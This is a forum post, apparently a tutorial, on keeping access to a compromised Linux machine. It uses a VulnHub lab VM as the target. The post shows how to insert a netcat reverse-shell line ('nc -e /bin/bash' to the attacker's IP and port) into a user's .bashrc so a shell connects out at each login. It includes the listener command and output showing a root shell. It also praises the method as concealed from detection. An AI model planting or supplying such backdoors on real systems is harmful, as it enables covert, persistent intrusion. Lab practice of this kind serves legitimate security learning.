Page 1 of 1

[Linux Persistence] UNIX SHELL CONFIG - PART 4

Posted: Tue Aug 13, 2024 6:39 am
by ethical hacker
Requirements:

  1. Kali Linux OR Parrot OS
  2. Practical understanding of T*****/IP
  3. The tutorial were conducted against a compromised Linux Virtual Machine that has been set up to demonstrate the process of exploitation and privilege escalation. It can be downloaded here:
    https://www.vulnhub.com/entry/raven-1,256/

Goal:
The intention is to secure a presence on the Linux target once an initial entry point has been acquired.

PART 4. UNIX SHELL CONFIGURATION MODIFICATION:
This persistence method will entail the insertion of a bash reverse command that shall initiate a connection back to our netcat listener in a user account's .bashrc file. The .bashrc file is a configuration file which is employed for personalising bash, and is executed when a user logs in using the bash shell.

The initial step will involve the opening of the .bashrc file utilising a text editor. This shall be accomplished through the execution of the following command:

Code: Select all

nano ~/.bashrc

Upon opening the aforementioned file by means of a text editor, we can incorporate a basic bash command which will afford us a reverse shell each time a user logs in. This can be achieved through the insertion of the following code:

Code: Select all

nc -e /bin/bash <KALI-IP> <PORT>   2>/dev/null

As displayed in the subsequent terminal, the said command shall incorporate your Kali IP and the port at which netcat is in a state of listening.
Terminal

Code: Select all

# Some more alias to avoid making mistakes:
# alias rm=' rm -i'
# alias *****=' ***** -i'
# alias mv=' mv -i'

nc -e /bin/bash 192.168.2.2 1234 2>/dev/null


Having integrated the aforementioned bash command into the .bashrc file, we shall then establish a listener via Netcat on Kali by executing the ensuing directive:

Code: Select all

nc -nvlp <PORT>

Upon a user logging in to the aforementioned user account, the command embedded within the .bashrc file shall be triggered and forthwith provide one with a reverse shell on the netcat listener, as evidenced by the ensuing terminal.
Terminal

Code: Select all

> $ nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.2.2] from (UNKNOWN) [192.168.2.100] 50123
id
uid=0(root) gid=0(root) groups=0(root)

We have now successfully established a degree of persistence by means of the .bashrc file. This method is particularly advantageous due to the concealed nature of the reverse shell command, which resides within a legitimate configuration file, thereby mitigating the likelihood of detection.